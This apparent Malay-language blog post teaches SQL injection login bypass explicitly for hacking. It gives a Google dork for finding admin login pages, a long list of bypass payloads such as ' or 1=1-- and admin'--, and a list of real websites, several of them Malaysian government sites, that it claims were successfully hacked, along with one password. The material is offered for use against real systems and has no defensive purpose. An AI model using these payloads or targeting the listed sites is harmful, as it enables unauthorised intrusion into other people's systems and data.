SQL Injection - a way to login web admin without password and username

Apa itu SQL Injection?
- vulnarable system/ internet website. ‘Magic Code’. ‘String Code’.
- technique that exploits a security vulnerability occurring in the database layer of an application.

Buat ape?
-kod untuk pecah masuk sesuatu system atau website yang mempunyai kata laluan.

Bila masa nak guna?
-masa nak hacks la……

Masuk website: http://www.milw0rm.com/
____________http://www.warexe.com/

copy kod ini - kamal' or '1'='1 // input pada username: passwd:
// atau pada login: pswd:
// atau userid: pswd:


cara cari laman web yang ada login dan admin:

google search: inurl: admin.php username password


code/magic kod untuk hack melalui pass n username

a' or 't'='t

(Variations)

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

1’or’1’=’1


Laman yang berjaya di hack

http://myeshop4u.com/admin.asp
http://asp.tech-cats.com/CareerTicket/admin/index.asp?logout=1
http://www.cashflowfromcreditcards.com/admin.asp
http://www.roomtwentyfour.com/aspproofs/admin.asp
http://www.azgoldenretrieverconnection.org/logon.asp
http://www.frim.gov.my/library/opac/pustakafiles/OPAC/admin.asp
http://www.kesedar.gov.my/Maklum%20Balas/admin.htm
http://www.compserv.sabah.gov.my/halalsabahsoaljawab/admin.asp
http://www.vistaexcellence.com/home.php
http://demo.webwizforums.com/admin.asp (password =letmein)